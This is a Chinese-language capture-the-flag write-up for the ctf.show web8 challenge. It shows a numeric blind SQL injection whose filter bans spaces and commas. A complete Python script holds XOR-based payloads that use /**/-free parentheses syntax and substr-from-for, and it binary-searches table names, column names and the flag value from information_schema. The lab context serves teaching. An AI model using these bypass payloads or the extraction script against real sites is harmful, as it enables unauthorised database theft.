ctf.show_web8

与web7一样，依旧是写脚本盲注，与web7不同的是这次把逗号放进了黑名单

看一眼就应该知道是sql注入，老规矩先看闭合‘and1=1#

回显有注入情节

再试试-1 or true判断是否是数字型注入

还是回显有注入情节

fuzz一下

可以看到把逗号还有空格放进了黑名单

空格用/**/代替或者用（）代替

是数字型注入

应为过滤了空格和逗号我不知道sqlmap怎么样才能跑出来所以写了个简单脚本（有大神的话请指导指导）

• import requests as re
  
  flag = ''
  url = 'http://5d5df583-bd9c-4868-92e7-0d46f3958e46.challenge.ctf.show/index.php?id='
  head = {
      'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.31'
  }
  
  for i in range(1, 100):
      high = 128
      low = 30
      print(f'{i}:')
      while high >= low:
          mid = (high + low)//2
  
          # 爆库名
          # payload1 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))>{mid})^1'
          # payload2 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))<{mid})^1'
          # payload3 = f'1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))from({i})for(1)))={mid})^1'
  
          # 爆字段
          # payload1 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))>{mid})^1'
          # payload2 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))<{mid})^1'
          # payload3 = f'1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))from({i})for(1)))={mid})^1'
  
          # 值
          payload1 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))>{mid})^1'
          payload2 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))<{mid})^1'
          payload3 = f'1^(ascii(substr((select(group_concat(flag))from(flag))from({i})for(1)))={mid})^1'
  
          r1 = re.get(url=url + payload1, headers=head)
          r2 = re.get(url=url + payload2, headers=head)
          r3 = re.get(url=url + payload3, headers=head)
  
          # 如果my son！在r3返回的的页面中则输出flag并退出循环
          if 'my son!' in r3.text:
              flag += chr(mid)
              print(flag)
              break
  
          if 'my son!' in r1.text:
              low = mid + 1
  
          if 'my son!' in r2.text:
              high = mid - 1
  
  print(flag)

应为逗号被放进来黑名单但是函数substr(,,)里有逗号所以用suvstr(      from      for   )替代逗号

跑出来表名为flag，似乎除了黑名单里多了个逗号其他的都和web7一摸一样

字段名还是flag

ctfshow{f8ca61d2-ab6d-4653-9608-14dd652d8c18}

(我做的时候有个小问题，有时候可能会跑出来ctfsh就几个就跑不动然后报错，我还以为是代码的问题，后面换了个网就好了，有时候可能网速也会影响脚本运行)